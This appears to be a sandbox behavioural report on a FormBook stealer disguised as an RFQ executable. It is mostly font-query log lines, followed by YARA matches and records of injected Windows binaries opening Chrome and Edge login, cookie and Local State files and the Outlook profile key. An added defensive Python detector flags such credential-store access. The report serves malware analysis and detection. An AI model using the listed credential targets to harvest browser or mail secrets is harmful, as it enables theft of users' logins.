Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EA50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00EA50D7
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EB2230 GetUserNameW,0_2_00EB2230
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EA418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00EA418A
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E74AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E74AFE
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match; file source: 1.2.svchost.exe.2500000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 13.2.xl9lsbb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; file source: 13.2.xl9lsbb.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 1.2.svchost.exe.2500000.0.unpack, type: UNPACKEDPE
Source: Yara match; file source: 00000001.00000002.1749592251.0000000002500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000E.00000002.4104203005.0000000006D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000F.00000002.4101074559.0000000000630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000F.00000002.4103858952.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000F.00000002.4103945476.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000D.00000002.3649278175.0000000005330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000D.00000002.3649137742.00000000016B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000001.00000002.1750132612.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000001.00000002.1749816358.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000003.00000002.4104107521.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000D.00000002.3647567861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000010.00000002.4103523467.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000002.00000002.4103630939.0000000003A30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000003.00000002.4101142200.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000003.00000002.4104284280.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000005.00000002.4105348256.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\runonce.exe; file opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\runonce.exe; file opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\runonce.exe; file opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\runonce.exe; file opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\runonce.exe; file opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\runonce.exe; file opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\runonce.exe; file opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\runonce.exe; file opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\runonce.exe; key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: RFQ - MK FMHS.RFQ.24.101.exe; binary or memory string: WIN_81
Source: RFQ - MK FMHS.RFQ.24.101.exe; binary or memory string: WIN_XP
Source: RFQ - MK FMHS.RFQ.24.101.exe; binary or memory string: WIN_XPe
Source: RFQ - MK FMHS.RFQ.24.101.exe; binary or memory string: WIN_VISTA
Source: RFQ - MK FMHS.RFQ.24.101.exe; binary or memory string: WIN_7
Source: RFQ - MK FMHS.RFQ.24.101.exe; binary or memory string: WIN_8
Source: RFQ - MK FMHS.RFQ.24.101.exe; binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Two things in this list deserve a practitioner's attention. First, the credential-store reads are performed by runonce.exe and RMActivate_ssp.exe, both legitimate binaries from C:\Windows\SysWOW64 that have no reason to open Chrome/Edge Cookies, Login Data, Web Data or Local State, or the Outlook profile key; that is the injected FormBook payload running inside them, and it is the behaviour to alert on. Second, the WIN_* tokens and the version string "3, 3, 14, 5" are the @OSVersion macro values and release number of the AutoIt v3.3.14.5 runtime compiled into the dropper, so they characterise the wrapper rather than the stealer.
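The runonce.exe and RMActivate_ssp.exe accesses above are the detection-worthy part of this section. The following is an added example, not part of the Joe Sandbox report and not code from any vendor, of the corresponding detection logic: it flags any non-browser process that opens a browser credential store and any non-mail process that opens the Outlook profile key, and raises the severity when the acting image lives in System32/SysWOW64. The event record (process, kind, target) is a hypothetical minimal schema, not a real EDR or Sysmon format; the sample events are constructed from the "File opened" and "Key opened" lines above plus two benign controls.

```python
"""Added detection example: credential-store access by non-browser/non-mail
processes. The Event schema is a hypothetical minimal record, not a real
EDR/Sysmon format; map your own telemetry onto it."""
from dataclasses import dataclass
from typing import Iterable, List

# Browser artefacts a stealer reads. "Local State" holds the DPAPI-wrapped key
# that unlocks "Login Data" and "Cookies", so it is worth watching as well.
BROWSER_STORE_FILES = {"cookies", "login data", "web data", "local state"}
# Registry path under which Outlook keeps its mail profiles (account data).
OUTLOOK_PROFILES = "\\windows messaging subsystem\\profiles\\"

BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "brave.exe", "firefox.exe"}
MAIL_IMAGES = {"outlook.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


@dataclass(frozen=True)
class Event:
    process: str  # full image path of the acting process
    kind: str     # "file" or "key"
    target: str   # file path or registry key that was opened


@dataclass(frozen=True)
class Finding:
    severity: str
    process: str
    target: str
    reason: str


def image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_browser_store(path: str) -> bool:
    # Profile directory names vary (Default, Profile 1, ...), so only the
    # "User Data" component and the file name are matched.
    p = path.lower()
    return "\\user data\\" in p and p.rsplit("\\", 1)[-1] in BROWSER_STORE_FILES


def is_outlook_profile_key(key: str) -> bool:
    return OUTLOOK_PROFILES in key.lower()


def evaluate(events: Iterable[Event]) -> List[Finding]:
    """Return one Finding per event that matches a stealer access pattern."""
    findings: List[Finding] = []
    for ev in events:
        img = image_name(ev.process)
        # A Windows binary from System32/SysWOW64 touching these stores is the
        # injection pattern in this report (runonce.exe, RMActivate_ssp.exe).
        severity = "high" if ev.process.lower().startswith(SYSTEM_DIRS) else "medium"
        if ev.kind == "file" and is_browser_store(ev.target) and img not in BROWSER_IMAGES:
            findings.append(Finding(severity, ev.process, ev.target,
                                    "non-browser process opened browser credential store"))
        elif ev.kind == "key" and is_outlook_profile_key(ev.target) and img not in MAIL_IMAGES:
            findings.append(Finding(severity, ev.process, ev.target,
                                    "non-mail process opened Outlook profile key"))
    return findings


OUTLOOK_KEY = ("HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\"
               "Windows Messaging Subsystem\\Profiles\\Outlook\\")

# Constructed sample events: three taken from the report's "File opened" /
# "Key opened" lines, then three benign controls (a browser and Outlook reading
# their own data, and runonce.exe reading a font, which is not a store).
SAMPLE_EVENTS = [
    Event(r"C:\Windows\SysWOW64\runonce.exe", "file",
          r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event(r"C:\Windows\SysWOW64\runonce.exe", "file",
          r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies"),
    Event(r"C:\Windows\SysWOW64\RMActivate_ssp.exe", "key", OUTLOOK_KEY),
    Event(r"C:\Program Files\Google\Chrome\Application\chrome.exe", "file",
          r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event(r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "key", OUTLOOK_KEY),
    Event(r"C:\Windows\SysWOW64\runonce.exe", "file", r"C:\Windows\Fonts\ONYX.TTF"),
]


def analyze_sample() -> List[Finding]:
    return evaluate(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in analyze_sample():
        print(f"[{f.severity}] {f.process} -> {f.target}: {f.reason}")
```

The allow-lists are deliberately short: on a real fleet add the browsers and mail clients you actually deploy, and keep the System32/SysWOW64 escalation, since a hollowed Windows binary is exactly what process-injection stealers hide behind.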

Remote Access Functionality

Source: Yara match; file source: 1.2.svchost.exe.2500000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 13.2.xl9lsbb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; file source: 13.2.xl9lsbb.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 1.2.svchost.exe.2500000.0.unpack, type: UNPACKEDPE
Source: Yara match; file source: 00000001.00000002.1749592251.0000000002500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
